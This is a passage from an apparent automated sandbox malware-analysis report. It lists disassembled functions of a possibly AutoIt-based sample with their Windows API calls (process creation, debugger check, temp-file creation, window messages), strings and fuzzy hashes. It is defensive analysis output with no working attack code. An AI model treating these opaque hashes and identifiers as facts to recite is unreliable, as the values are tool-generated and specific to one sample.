                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00E51CC8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_wcslen
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 624084870-1403004172
                                                        • Opcode ID: e8f3394e43fb3727ff7b276f04a1a2ab1e652cadda6f817a9ca63e2f094f7e7c
                                                        • Instruction ID: 6a2b117e5cd9052a4c258a02d5dd52dcde181e389e50a22b9c71b32c69f99244
                                                        • Opcode Fuzzy Hash: e8f3394e43fb3727ff7b276f04a1a2ab1e652cadda6f817a9ca63e2f094f7e7c
                                                        • Instruction Fuzzy Hash: F201DBB1A4021867CB18EBA1CA51BFFF7E89B11381F145455BD0573281EA219F1CC671
                                                        Function 00E0A4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __Init_thread_footer.LIBCMT ref: 00E0A529
                                                          • Part of subcall function 00DF9CB3: _wcslen.LIBCMT ref: 00DF9CBD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Init_thread_footer_wcslen
                                                        • String ID: ,%$3y
                                                        • API String ID: 2551934079-4248191106
                                                        • Opcode ID: eb3e65567e5709cc07fc1c2647a04c5e6a06dc854f6a70b920e3134d2cbe0480
                                                        • Instruction ID: 84b8ec9c89d8f62f83c190233e1c9cb612b3be7443e37e11945716393ec382b2
                                                        • Opcode Fuzzy Hash: eb3e65567e5709cc07fc1c2647a04c5e6a06dc854f6a70b920e3134d2cbe0480
                                                        • Instruction Fuzzy Hash: FA012F32A003188BC600B7A89C1BFED7394EB05720F086038F616771C2EEA0998286A7
                                                        Function 00E51D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00DF9CB3: _wcslen.LIBCMT ref: 00DF9CBD
                                                          • Part of subcall function 00E53CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00E53CCA
                                                        • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00E51DD3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_wcslen
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 624084870-1403004172
                                                        • Opcode ID: d676274136c7f9a692d2f0f8a7013caebd170419c123bc3aa277358ab819e990
                                                        • Instruction ID: 94084a402d088d987acbede2c8e325562bb12b4ef7a7804dfa648b70167b9e0c
                                                        • Opcode Fuzzy Hash: d676274136c7f9a692d2f0f8a7013caebd170419c123bc3aa277358ab819e990
                                                        • Instruction Fuzzy Hash: 41F08171A4121866DB14ABA4CCA2BFFB7B8AB02395F041D15F926B32C1EA60590C8371
                                                        Function 00E88172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00EC3018,00EC305C), ref: 00E881BF
                                                        • CloseHandle.KERNEL32 ref: 00E881D1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateHandleProcess
                                                        • String ID: \0
                                                        • API String ID: 3712363035-3218720685
                                                        • Opcode ID: de5677a5f172dc2911bd592b6ba79a64df0a750eea66e5d562335f65cb390b8c
                                                        • Instruction ID: 6815f71d7cba00d680b2571a004ee73c0804b8c5a29a03eecd7929f9c107e735
                                                        • Opcode Fuzzy Hash: de5677a5f172dc2911bd592b6ba79a64df0a750eea66e5d562335f65cb390b8c
                                                        • Instruction Fuzzy Hash: C3F05EB2640300BEE2206772AC47FB77A9CEB05750F009475BF0CF51A2D6768E5A93B8
                                                        Function 00E7747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: _wcslen
                                                        • String ID: 3, 3, 16, 1
                                                        • API String ID: 176396367-3042988571
                                                        • Opcode ID: 8af1f46a6ac16a49d7d08da01a7d7255edee8d36dec483231a6e284b1e72d419
                                                        • Instruction ID: ed41db32408389547995c703390e7d9224591fcf98f539489f564bcc2e3630e8
                                                        • Opcode Fuzzy Hash: 8af1f46a6ac16a49d7d08da01a7d7255edee8d36dec483231a6e284b1e72d419
                                                        • Instruction Fuzzy Hash: 0BE02B52204321109331127A9CC19BF5AC9DFC5750714382BF9D9F23B6FA948DD193A0
                                                        Function 00E50B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E50B23
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Message
                                                        • String ID: AutoIt$Error allocating memory.
                                                        • API String ID: 2030045667-4017498283
                                                        • Opcode ID: e69648cc737d5f0c28fa045c6695177993881c351fe328cd7741b156725d55f3
                                                        • Instruction ID: b9694decd5689d33ec92a6bf6bfc7eeeee7cbe79986864b7854d4db9c08c2cef
                                                        • Opcode Fuzzy Hash: e69648cc737d5f0c28fa045c6695177993881c351fe328cd7741b156725d55f3
                                                        • Instruction Fuzzy Hash: 69E048322443182AD22477557C43FC97AC49F06B65F205466FB5C799D38AE264A047F9
                                                        Function 00E10D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E0F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00E10D71,?,?,?,00DF100A), ref: 00E0F7CE
                                                        • IsDebuggerPresent.KERNEL32(?,?,?,00DF100A), ref: 00E10D75
                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00DF100A), ref: 00E10D84
                                                        Strings
                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E10D7F
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                        • API String ID: 55579361-631824599
                                                        • Opcode ID: 557c86017eaedd8fb19ec0ffb205126acdd35711a590b8774c668033b008cf69
                                                        • Instruction ID: 18c022e70148e08e30f11a51ce70366ea8cf65d2eb648f749ed25d377a2a3dd5
                                                        • Opcode Fuzzy Hash: 557c86017eaedd8fb19ec0ffb205126acdd35711a590b8774c668033b008cf69
                                                        • Instruction Fuzzy Hash: 9EE09B702007418FD3309FBDE4047427BE0AF04754F04992DE48AE7661DBF5E4C88BA1
                                                        Function 00E0E398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __Init_thread_footer.LIBCMT ref: 00E0E3D5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Init_thread_footer
                                                        • String ID: 0%$8%
                                                        • API String ID: 1385522511-2949748613
                                                        • Opcode ID: 54cf7e0dd14ee8f17433d1e94b19386bce8f85a9de2cbbd5889fbf0286bb023f
                                                        • Instruction ID: 7c06497de95316ed8de0bc2b64701f08fc7079511cd925f8576df366effbb51d
                                                        • Opcode Fuzzy Hash: 54cf7e0dd14ee8f17433d1e94b19386bce8f85a9de2cbbd5889fbf0286bb023f
                                                        • Instruction Fuzzy Hash: 63E02631404D20CFC6049718B955ECA3791AB45320B10B57CE312BB3D29F7A68C78646
                                                        Function 00E63017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00E6302F
                                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00E63044
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Temp$FileNamePath
                                                        • String ID: aut
                                                        • API String ID: 3285503233-3010740371
                                                        • Opcode ID: ddf5d58603747779713f8076073af3f929ebdc0f3de7e06dc5ace317e233bf78
                                                        • Instruction ID: 0630e8978ab1f8989513eda70d10e8659f3c26fe5e3469774a5374c4fb6ae045
                                                        • Opcode Fuzzy Hash: ddf5d58603747779713f8076073af3f929ebdc0f3de7e06dc5ace317e233bf78
                                                        • Instruction Fuzzy Hash: 73D05B71500314ABDA2097959D0DFC73A6CD705750F0001517655F20E1DAB49544CBE0
                                                        Function 00E4D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: LocalTime
                                                        • String ID: %.3d$X64
                                                        • API String ID: 481472006-1077770165
                                                        • Opcode ID: 752067cfb5f161db747db2b407088a7163c43e439703681565c9f2e2a9afbafc
                                                        • Instruction ID: 745940ee1d9293446c010196964ad85957e01c05e2492d35a6ce2dfa3949fd67
                                                        • Opcode Fuzzy Hash: 752067cfb5f161db747db2b407088a7163c43e439703681565c9f2e2a9afbafc
                                                        • Instruction Fuzzy Hash: 90D05B71C0C109FACB9097D0EC498FAB3BCFB18301F60A452F80BF1090E674C5486B65
                                                        Function 00E82356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E8236C
                                                        • PostMessageW.USER32(00000000), ref: 00E82373
                                                          • Part of subcall function 00E5E97B: Sleep.KERNELBASE ref: 00E5E9F3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: 6aff1b97bd8933cdd9b148caddfca1d25e1afa296f133fec938bfc97b6bed892
                                                        • Instruction ID: c38f83ee6d82ec9d282ed6837d75a762ce1eec710be616db8750962aae3f780d
                                                        • Opcode Fuzzy Hash: 6aff1b97bd8933cdd9b148caddfca1d25e1afa296f133fec938bfc97b6bed892
                                                        • Instruction Fuzzy Hash: 9FD0A9323803107BE668A3319C0FFC666049B02B00F2009127609BA1E0C8B0A8098B24
                                                        Function 00E82322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E8232C
                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00E8233F
                                                          • Part of subcall function 00E5E97B: Sleep.KERNELBASE ref: 00E5E9F3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: a41f67f6a8991be763dafa6e17260f2ba29ca6afec0a0d67191a5e005f9ca5f7
                                                        • Instruction ID: 0c8c175b69fe3274967748b0982c9531546553c10a09530a36d921142c8dbb94
                                                        • Opcode Fuzzy Hash: a41f67f6a8991be763dafa6e17260f2ba29ca6afec0a0d67191a5e005f9ca5f7
                                                        • Instruction Fuzzy Hash: 1AD02232380310BBE668B331DC0FFC77A049B01B00F2009127709BA1E0C8F0A809CB20
                                                        Function 00E2BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00E2BE93
                                                        • GetLastError.KERNEL32 ref: 00E2BEA1
                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00E2BEFC
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                        • String ID:
                                                        • API String ID: 1717984340-0
                                                        • Opcode ID: 559b60ead2b20cf433ec30a693796c298773912257ee5bc72561c1f7cc91fde2
                                                        • Instruction ID: 7545170329b2727c8a5364209dfb61e398246e47f43b1a2e6229059a6e9aab7b
                                                        • Opcode Fuzzy Hash: 559b60ead2b20cf433ec30a693796c298773912257ee5bc72561c1f7cc91fde2
                                                        • Instruction Fuzzy Hash: D6411A35700226AFDF218F65ED44AFA7BB5EF41324F255169F959B71A1DB308C01CB60